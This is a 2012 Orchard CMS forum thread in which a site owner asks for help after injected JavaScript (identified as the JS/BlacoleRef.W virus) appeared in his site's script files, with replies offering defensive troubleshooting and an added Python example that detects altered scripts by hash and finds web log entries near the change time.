Script Injection Attack

Topics: General, Writing modules
Editor
Jul 18, 2012 at 4:11 AM

I ask this question because I am not an expert on injection attacks and have had the same production server compromised twice now while running an Orchard CMS installation. I am running Orchard v.1.2.42.0 and have had some script injection occur in files inside my webroot. The files affected were Modules\Orchard.jQuery\Scripts\jquery-1.6.1.min and two script files in my Themes\Scripts directory, html5.js and base.js, two files included in Document.cshtml.

Are there any known vulnerabilities out there right now? Is the only way someone could modify one of these files to access the hosting server itself? I have pretty standard modules installed for the most part, nothing out of the ordinary.

Any thoughts, let me know. Thanks

Jul 18, 2012 at 5:11 AM

I'm no expert but here are some ideas.

  1. Check the web.config file inside the Scripts folder. Make sure the accessPolicy allows Script and Read only.
      <system.webServer>
        <handlers accessPolicy="Script,Read">
        </handlers>
      </system.webServer>
  2. If you find the files changed, take note of the exact date/time it was changed and check your web server logs for incoming traffic around that time. What URL was called, query strings, etc. If you find something suspicious, take note of originating IP and block it. 

I hope this helps
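As an added example (not part of the thread, and not Orchard's own code), the second step above in Python: a baseline hash comparison that lists the .js files under the webroot that no longer match a known-good copy, with their modification time in UTC, and an IIS W3C log parser that pulls the requests logged within a window around that time. The log excerpt, the file tree built by demo() and every address in it are constructed.

```python
import hashlib
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path

TS = "%Y-%m-%d %H:%M:%S"  # timestamp layout used by IIS logs (UTC by default)

# Constructed IIS W3C log excerpt (not from the thread), default IIS field order.
SAMPLE_IIS_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2012-07-17 02:58:10 10.0.0.5 GET /Themes/MyTheme/Scripts/base.js - 80 - 203.0.113.9 Mozilla/5.0 200 0 0 15
2012-07-17 03:04:41 10.0.0.5 POST /Contact - 80 - 203.0.113.9 Mozilla/5.0 200 0 0 120
2012-07-17 03:05:02 10.0.0.5 GET /Admin/Modules - 80 - 198.51.100.7 Mozilla/5.0 302 0 0 40
"""

def parse_iis_log(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif fields and line.strip() and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def requests_near(log_text, modified_at, window_minutes=30):
    """Requests logged within +/- window_minutes of modified_at (TS format, UTC)."""
    centre = datetime.strptime(modified_at, TS)
    window = timedelta(minutes=window_minutes)
    return [e for e in parse_iis_log(log_text)
            if abs(datetime.strptime(e["date"] + " " + e["time"], TS) - centre) <= window]

def changed_scripts(webroot, baseline):
    """Yield (relative path, UTC mtime) for each .js whose SHA-256 differs from baseline, a {relative_path: sha256hex} dict from a known-good copy."""
    root = Path(webroot)
    for path in root.rglob("*.js"):
        rel = path.relative_to(root).as_posix()
        if baseline.get(rel) != hashlib.sha256(path.read_bytes()).hexdigest():
            stamp = datetime.fromtimestamp(path.stat().st_mtime, timezone.utc)
            yield rel, stamp.strftime(TS)

def demo():
    # Throw-away webroot with one clean and one tampered theme script (constructed).
    root = Path(tempfile.mkdtemp())
    (root / "Scripts").mkdir()
    good = {"html5.js": b"window.html5 = {};\n", "base.js": b"var base = 1;\n"}
    baseline = {}
    for name, body in good.items():
        (root / "Scripts" / name).write_bytes(body)
        baseline["Scripts/" + name] = hashlib.sha256(body).hexdigest()
    # Simulate a script block appended to base.js after the baseline was taken.
    (root / "Scripts" / "base.js").write_bytes(good["base.js"] + b"/*x*/try{}catch(e){}")
    return [rel for rel, _ in changed_scripts(root, baseline)]
```

On a real server, feed the mtime that changed_scripts reports into requests_near together with the IIS log for that day; real logs encode spaces in the User-Agent as '+', so the whitespace split still holds.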

Jul 18, 2012 at 3:43 PM

I'd be interested to hear more about your problem, including some of the details on what was modified for the injection within jQuery.

Jul 18, 2012 at 3:45 PM
yeorwned wrote:

I'd be interested to hear more about your problem, including some of the details on what was modified for the injection within jQuery.

I'm interested too in this. 

Editor
Jul 18, 2012 at 6:00 PM

My Orchard installation contains some modules that allow form submission:

1. A contact form

2. A request for alerts form.

3. Signup to volunteer form. (This form reposts data to the website after it goes into the DB, but is escaped properly.)

What I noticed (this is the second time) is that a block of script gets placed in some JS files on my Orchard site and is then running and causing an injection attack. I notice because Chrome warns me when I visit the site. I track the files down by using the command line utility FINDSTR and locating some of the text in the script. This time I found the text in the jQuery module folder that ships with Orchard, and in some script files in my theme.

I am not sure how someone could modify those files unless they had access to the host itself. Either they are breaking into FTP, something is installed on the host doing this, or lastly somehow they are able to gain access to the CMS or exploit a form somehow. The last one seems pretty hard for them to do and then modify a file.

I checked my Orchard logs around the time period that the files were modified and I saw nothing. I have contacted the hosting provider to let me know of any login attempts around that time frame, and I am going to look in the event viewer as well. I am just wondering how feasible it is for someone to inject code into a file that lives on the physical system through the Orchard site itself. I am not writing out any files anywhere in my code right now.

Thanks

Coordinator
Jul 18, 2012 at 6:28 PM

There is no known vulnerability, and this is the first time we have heard about this issue. You might want to remove write access to those files from the app pool account. If this happens again then it must be from an external source.

Coordinator
Jul 18, 2012 at 6:29 PM

Could you provide us with the code snippet that was injected? We could check some other sites, at least those running the same Orchard version as you do.

Editor
Jul 18, 2012 at 6:45 PM

Here is the snippet:

[obfuscated JavaScript payload omitted]

Coordinator
Jul 18, 2012 at 7:12 PM

This is the JS/BlacoleRef.W virus, as Outlook prevented me from seeing the code.

Simple questions:
- Have you used the server to browse the internet? You might have got infected this way.
- Is the server allowing TS connections? If so, could you check every past connection in the Windows audit?
- Do you have a non-patched Windows server (using Windows Update)?

If the answer is a strict NO then we might ask you to give us access to the server so that MS security experts can do some analysis.

Thanks


Editor
Jul 18, 2012 at 7:17 PM

The server is a hosted server from a third party. It runs Plesk Control Panel, which I believe has its own problems. I will forward the info you sent me to the hosting provider. I feel like it is possible it could have come in through one of the items you listed. If you want access I can also provide it. Would like to confirm it is not Orchard as well :)

Appreciate the help.

Coordinator
Jul 18, 2012 at 7:22 PM

Odds that it comes from Orchard are very low, as we would have had some other reports, and maybe from bigger websites, starting with ours. Our codebase is also checked by security experts to ensure there is no threat. But we can never be certain there is no issue, so let's investigate more.

Jul 18, 2012 at 7:35 PM

I recognize that code. It infected some computers at work and I found it on an external web site. Turns out all their .js files were infected with this. They're not running Orchard but instead a static HTML site with some JavaScript for jQuery and menus, so they were probably attacked by FTP or some way through the hosting provider. So I'd say this has nothing to do with Orchard.

Jul 26, 2012 at 7:30 PM

Thanks for sharing.